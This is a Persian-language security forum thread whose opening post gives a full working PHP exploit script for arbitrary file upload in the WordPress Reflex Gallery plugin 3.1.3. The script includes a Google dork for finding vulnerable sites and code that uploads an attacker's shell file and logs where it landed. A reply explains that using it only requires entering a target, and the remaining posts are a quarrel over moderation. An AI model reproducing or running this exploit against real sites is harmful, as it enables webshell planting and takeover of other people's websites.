رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

<?php

/*
  # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
  # TIPE:          Arbitrary File Upload
  # Google DORK:   inurl:"wp-content/plugins/reflex-gallery/"
  # Vendor:        https://wordpress.org/plugins/reflex-gallery/
  # Tested on:     Linux
  # Version:       3.1.3 (Last)
  # EXECUTE:       php exploit.php www.alvo.com.br shell.php
  # OUTPUT:        Exploit_AFU.txt
  # POC            http://i.imgur.com/mpjXaZ9.png
  # REF COD        http://1337day.com/exploit/23369

--------------------------------------------------------------------------------
  <form method = "POST" action = "" enctype = "multipart/form-data" >
  <input type = "file" name = "qqfile"><br>
  <input type = "submit" name = "Submit" value = "Pwn!">
  </form >

--------------------------------------------------------------------------------

  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin   http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl/
  # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
 */

error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

function __plus() {

    ob_flush();
    flush();
}

function __request($params) {

    $objcurl = curl_init();
    curl_setopt($objcurl, CURLOPT_URL,
"{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03");
    curl_setopt($objcurl, CURLOPT_POST, 1);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' =>
"@{$params['file']}"));
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    $info['corpo'] = curl_exec($objcurl) . __plus();
    $info['server'] = curl_getinfo($objcurl) . __plus();
    curl_close($objcurl) . __plus();
    return $info;
}

echo "[+]  Wordpress Plugin Reflex Gallery - Arbitrary File Upload
Vulnerability\n\n";
$params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO]
DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1],
'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE
TARGET!\n"));
__request($params) . __plus();
$_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}";
$_h =
get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}",
1);
foreach ($_h as $key => $value) {
    echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n";
}
$_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200'));
print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL'
: '[-] NOT VULL');
print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+]
{$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) :
'[-] ERROR!');
WordPress Reflex Gallery 3.1.3 Shell Upload

 

حالشو ببرین   :D

 

 

یا حق

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

استفاده از اکسپلویت هیچ کاری نداره.فقط کافیه شما تارگت خودتون رو در بخش مربوطه که در این اکسپلویت Target هست قرار بدی و اکسپلویت رو اجرا کنی.

اسپم ممنوع

یا حق

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

بخدا اولین فروم امنیتی می بینم کسی نیست جوابتو بده حرفهای منطقیو اسپم می دونن

مدیریت کل سایتو هم خواستم بهش پیام خصوصی بدم صندوق پیامش پره برای rexنوشتم اونهم که اصلا جواب نداد اون مدیر کلم که نیست جواب نمیده اینجا چه خبره؟ کسی نیست جواب بده؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

بخدا اولین فروم امنیتی می بینم کسی نیست جوابتو بده حرفهای منطقیو اسپم می دونن

مدیریت کل سایتو هم خواستم بهش پیام خصوصی بدم صندوق پیامش پره برای rexنوشتم اونهم که اصلا جواب نداد اون مدیر کلم که نیست جواب نمیده اینجا چه خبره؟ کسی نیست جواب بده؟

دوست عزیز پاسخ شما داده شده.دیگه چه سوالی دارین؟

مشکلتون چیه؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام

 

کاربرعزیز تمام آموزشات ما در سایت کاملا مجانی بوده و افرادی که این آموزش ها رو قرار میدن از روی عشق و علاقه به این کار هست. پس هیچ تعهدی ندارند که همون لحظه جواب شما رو بدن.

 

خدمت شما کاربر عزیز عرض کنم شما با صحبت هاتون معلومه در چند انجمن تجربه داشتین و شاید دیده باشین که در هر انجمن بخشی هست بنام سوال و جواب های عمومی که همه کاربران سوال هاشون رو در اونجا مطرح میکنن.

 

اینکار باعث میشه کیفیت پست ها پایین نیاد و شاید همین سوال شما روزی سوال یه کاربر دیگه باشه و بخاطر همین باید در جای خودش پرسیده بشه . ( هر سخن جایی و هر نکته مکانی .. )

 

برای همه کاربران میگم انتظار نداشته باشین همون لحظه به سوال هاتون جواب بدیم. چون برای جواب دادن به سوال شما و بررسی مشکل شما خودمان با همون ابزار یا اکسپلویت و ... کار میکنیم تا مشکل شما رو به بهترین شکل حل کنیم.

 

و جواب شما هم داده شده بود.

 

موفق باشید.

 

تاپیک قفل

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

من همون اولشم مشکل با هیچکس نداشتم و ندارم و حتی قصدم همکاریه خداروشکر مدیرای کلو مدیرای بخشو هیچکس که نیستن حتی جواب پیام خصوصی منو بدن در مورد این اکسپلویت هم گفتم توضیح میدادین بد نبود اما همش میگین اسپمو اخطار میدیم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

کاربر عزیز صندوق پیام من خالی بود و شما گفتین پره و گفتین به اون مدیر پیام دادین در صورتی که اون مدیر هیچ پیامی دریافت نکرده .... به rex پیام دادین ایشونم به من گفتن و پیام شما رو خوندم و اگه نیاز بود به شما جواب میدادم.

 

 

شما اگر صبور بودید و واقعا به این اکسپلویت نیاز داشتین فقط کمی دقت به اکسپلویت میکردین میدید در خود اکسپلویت لینک آموزشی سازنده هست.

 # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA

لطفا این بحث رو ادامه ندید و اگر کاری بابت همکاری داشتین پیام خصوصی کنید و تصمیم گیری میکنیم لازم بود جواب میدم.

 

موفق باشید.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

مهمان
این موضوع برای عدم ارسال قفل گردیده است.

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...